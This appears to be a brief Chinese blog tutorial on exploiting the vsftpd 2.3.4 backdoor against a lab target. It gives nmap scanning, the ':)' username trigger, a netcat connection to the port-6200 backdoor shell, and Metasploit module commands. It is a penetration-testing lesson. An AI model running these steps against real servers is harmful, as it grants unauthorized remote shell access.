vsftp2.3.4后门利用
简介
VSFTP是一个基于GPL发布的类Unix系统上使用的FTP服务器软件,它的全称是Very Secure FTP 从此名称可以看出来,编制者的初衷是代码的安全。(来源:百度百科)
一、手动利用
1.扫描vsftp版本号
nmap -p 21 -sV 192.168.115.128

2.漏洞利用,通过ftp连接靶机ip,登陆时在用户名后加 :) ,后会开启一个6200端口
ftp 192.168.115.128 //连接ftp nc -nvv 192.168.115.128 6200 //连接后门

3.通过netcat连接端口
nc -nvv 192.168.115.128 6200

二、metasploit利用
1.使用模块加参数
use exploit/unix/ftp/vsftpd_234_backdoor //选择模块 set rhosts 192.168.115.128 //设置靶机IP exploit //开始攻击
发表评论